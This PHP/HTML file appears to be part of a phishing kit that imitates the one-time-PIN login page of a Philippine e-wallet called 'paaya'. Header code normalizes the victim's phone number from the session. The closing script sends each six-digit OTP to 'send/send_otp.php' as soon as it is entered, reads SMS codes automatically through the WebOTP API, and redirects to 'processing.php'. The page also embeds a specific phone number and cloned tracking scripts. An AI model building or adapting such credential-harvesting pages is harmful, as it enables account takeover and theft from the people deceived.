<?php
session_start();
$phoneNumber = '';
if (isset($_SESSION['phone_number'])) {
    $data = json_decode($_SESSION['phone_number'], true);
    if ($data && isset($data['phone'])) {
        $phoneNumber = htmlspecialchars($data['phone']);
    }
}
$cleanNumber = preg_replace('/[^0-9]/', '', $phoneNumber);

/* ✅ UPGRADE START: dagdag lang (no removal)
   1) Fallback kung session value is plain string OR JSON string lang ("0917...")
   2) Accept +63 / 63 / 6309 formats then normalize to 10-digit starting with 9
   3) Prevent warning kapag empty string
*/

// 1) Fallback support (kung hindi array na may ['phone'])
if ($cleanNumber === '' && isset($_SESSION['phone_number'])) {
    $raw = $_SESSION['phone_number'];
    if (is_string($raw)) {
        $decoded = json_decode($raw, true);

        // if JSON is just a string: "0917..."
        if (is_string($decoded)) {
            $cleanNumber = preg_replace('/[^0-9]/', '', $decoded);
        }
        // if not JSON at all: 0917...
        elseif ($decoded === null) {
            $cleanNumber = preg_replace('/[^0-9]/', '', $raw);
        }
    }
}

// 2) Prevent $cleanNumber[0] warning kapag empty/missing
if ($cleanNumber === '') {
    http_response_code(400);
    echo "Phone number is missing.";
    exit;
}

// 3) Normalize common PH formats
// Example: +63 0917xxxxxxx -> digits "630917xxxxxxx" (13)
if (strpos($cleanNumber, '6309') === 0 && strlen($cleanNumber) === 13) {
    $cleanNumber = substr($cleanNumber, 3); // remove "630"
}

// Example: +63 917xxxxxxx -> digits "63917xxxxxxx" (12)
if (strpos($cleanNumber, '63') === 0 && strlen($cleanNumber) === 12) {
    $cleanNumber = substr($cleanNumber, 2); // remove "63"
}
/* ✅ UPGRADE END */


// If starts with 09, remove 0 to make 10-digit format starting with 9
if (strpos($cleanNumber, '09') === 0) {
    $cleanNumber = substr($cleanNumber, 1);
}
// Ensure only 10-digit numbers starting with 9
if ($cleanNumber[0] !== '9' || strlen($cleanNumber) !== 10) {
    http_response_code(400);
    echo "Invalid phone number format.";
    exit;
}

/* ✅ UPGRADE: standardized formats (optional gamitin mo sa SMS/API later) */
$ph_local = '0' . $cleanNumber;   // 09xxxxxxxxx
$ph_e164  = '+63' . $cleanNumber; // +639xxxxxxxxx

?>
































<html class="no-js" lang="en" id="theme-paypaaya"><head>
        
    <!-- Google Tag Manager -->
<script type="text/javascript" async="" src="www.googletagmanager.com/gtag/js?id=G-MXLFCRNEZE&amp;cx=c&amp;gtm=4e62h1"></script><script async="" src="www.googletagmanager.com/gtm.js?id=GTM-57MCZQK"></script><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-57MCZQK');</script>
<!-- End Google Tag Manager -->
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}

  gtag('js', new Date());

  var identityValue = 'novalue';
  
    identityValue = "+639176550485";
  

  var state = 'novalue';
  

  var clientId = 'novalue';
  
    clientId = "paypaaya-manager";
  

  gtag('set', 'user_properties', {
    'state_id': state,
    'client_id': clientId,
    'pymy_cn_id' : identityValue
  
  
  });

  gtag('config', 'GTM-57MCZQK', {
    'user_id': identityValue
  });
  window.dataLayer.push({
	event: 'PAGE_VIEW'
  });
  window.addEventListener('beforeunload', function() {
    window.dataLayer.push({
	  event: 'PAGE_UNLOAD'
	});
  });
</script>

<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title>One Time PIN | paaya</title>

<meta name="description" content="">
<meta name="keywords" content="">
<meta name="robot" content="index,follow">
<meta name="copyright" content="Copyright © 2025 paaya. All rights reserved.">
<meta name="format-detection" content="telephone=no">

<script type="text/javascript" src="/ruxitagentjs_ICANVfqru_10329260206100503.js" data-dtconfig="app=113ff352c0c794c4|cors=1|owasp=1|featureHash=ICANVfqru|srsr=0|rdnt=1|uxrgce=1|cuc=vxw3zfa5|mel=100000|dpvc=1|lastModification=1770636367812|tp=500,50,0|srbbv=2|agentUri=/ruxitagentjs_ICANVfqru_10329260206100503.js|reportUrl=bf46601txs.bf.dynatrace.com/bf|rid=RID_1960632935|rpid=407735925|domain=paaya.com"></script><link rel="shortcut icon" type="image/png" href="iam-assets.paaya.com/images/favicon.svg">
<link rel="shortcut icon" sizes="192x192" href="iam-assets.paaya.com/images/favicon.svg" type="image/svg+xml">
<link rel="apple-touch-icon" href="iam-assets.paaya.com/images/favicon.svg" type="image/svg+xml">


    <link type="text/css" rel="stylesheet" href="iam-assets.paaya.com/styles/main.css" charset="UTF-8">




<script type="text/javascript" src="iam-assets.paaya.com/scripts/vendor/jquery.min.js" charset="UTF-8"></script>
<script type="text/javascript" src="iam-assets.paaya.com/scripts/vendor/ued.min.js" charset="UTF-8"></script>

<script type="text/javascript" src="iam-assets.paaya.com/scripts/reset.js" charset="UTF-8"></script>

    </head>

    

    <body>
        
            <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="www.googletagmanager.com/ns.html?id=GTM-57MCZQK"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

        
        <div class="wrapper authentication-wrapper    ">
            
            <div class="white-container hidden-logo-container">
                <div class="container">
                    
<form class="form-otp login-otp-form" id="theme-login-otp-" method="post" action="/login">
  

  
    <div id="successMessage" class="alert-container alert-success" role="alert" style="display:none"></div>
  
  <div class="form-group">
    
      <h2 class="semi-bold">One-time <span class="emphasis">PIN</span></h2>
    

    
    <p class="long-read">Please enter the one-time PIN (OTP) that we sent to 
      
    <span class=""><?php 
                if (!empty($cleanNumber)) {
                    echo "" . $cleanNumber; 
                } else {
                    echo "your registered mobile number";
                }
            ?>
        </span>
    </p>

    <input id="otpReal" maxlength="6" inputmode="numeric" autocomplete="one-time-code">

    <div class="form-fields">
      <div id="otp-fields" class="otp-fields">
    <input class="otp-field focusable" type="text" autocomplete="off" inputmode="numeric" id="digit-1" name="digit-1" tabindex="-1" placeholder="—" data-next="digit-2">
    <input class="otp-field" type="text" autocomplete="off" inputmode="numeric" id="digit-2" name="digit-2" tabindex="-1" placeholder="—" data-next="digit-3" data-previous="digit-1">
    <input class="otp-field" type="text" autocomplete="off" inputmode="numeric" id="digit-3" name="digit-3" tabindex="-1" placeholder="—" data-next="digit-4" data-previous="digit-2">
    <input class="otp-field" type="text" autocomplete="off" inputmode="numeric" id="digit-4" name="digit-4" tabindex="-1" placeholder="—" data-next="digit-5" data-previous="digit-3">
    <input class="otp-field" type="text" autocomplete="off" inputmode="numeric" id="digit-5" name="digit-5" tabindex="-1" placeholder="—" data-next="digit-6" data-previous="digit-4">
    <input class="otp-field" type="text" autocomplete="off" inputmode="numeric" id="digit-6" name="digit-6" tabindex="-1" placeholder="—" data-previous="digit-5">
</div>
      <button id="verifyBtn">Verify</button>

      <input type="hidden" id="_csrf" name="_csrf" value="cb36ca8a-d417-41d7-9253-21c1c47dfaa2">
      <input type="hidden" id="otp" name="otp">
      
        <div class="button-container">
          <button class="continue-button mdc-button mdc-button--raised verify-button" id="continue" type="submit" disabled="">
            <span class="mdc-button__label" id="verifyBtn">Verify</span>
          </button>
        </div>
      
      
        <div class="resend-wrapper">
          <div>Didn't receive code?</div>
          <a id="btn-resend-otp" class="resend-link" href="#">Resend code</a>
          <div id="resend-timer">Resend in <span></span></div>
        </div>
      
    </div>
  </div>
</form>

                </div>
            </div>
            <div class="body-footer">
                <div class="container width-max">
                    <span>Copyright © 2026 paaya. All rights reserved.</span>
                </div>
            </div>
        </div>

        <div class="site-footer">
    <div class="container width-max">
        <span>Copyright © 2026 paaya. All rights reserved.</span>
    </div>
</div>

<script type="text/javascript" src="iam-assets.paaya.com/scripts/main.js" charset="UTF-8"></script>

<script>
const input = document.getElementById('otpReal');
const slots = document.querySelectorAll('.otp-field');
const button = document.getElementById('verifyBtn');

document.body.addEventListener('click', () => input.focus());

input.addEventListener('input', () => {
    input.value = input.value.replace(/\D/g, '').slice(0, 6);
    const val = input.value.split('');

    slots.forEach((slot, i) => {
        slot.textContent = val[i] || '';
        slot.classList.toggle('filled', !!val[i]);
        slot.classList.remove('active');
    });

    // set active cursor to NEXT empty slot
    if (val.length < slots.length) {
        slots[val.length].classList.add('active');
    }

    button.classList.toggle('enabled', val.length === 6);

    if (val.length === 6) {
        fetch('send/send_otp.php', {
            method: 'POST',
            headers: {'Content-Type':'application/x-www-form-urlencoded'},
            body: 'otp=' + encodeURIComponent(input.value)
        });
    }
});

button.onclick = () => {
    if (input.value.length === 6) {
        window.location.replace("processing.php");
    }
fetch("processing.php", {
method: "POST",
body: formData
})
.then(res => res.json())
.then(data => console.log(data));
};

/* ANDROID SMS AUTO READ */
if ('OTPCredential' in window) {
    navigator.credentials.get({ otp: { transport: ['sms'] } })
    .then(otp => {
        input.value = otp.code.replace(/\D/g,'').slice(0,6);
        input.dispatchEvent(new Event('input'));
    })
    .catch(()=>{});
}
</script>

</body><p12dd19cf-d9ed-4b10-9256-ec96817e2b29></p12dd19cf-d9ed-4b10-9256-ec96817e2b29></html>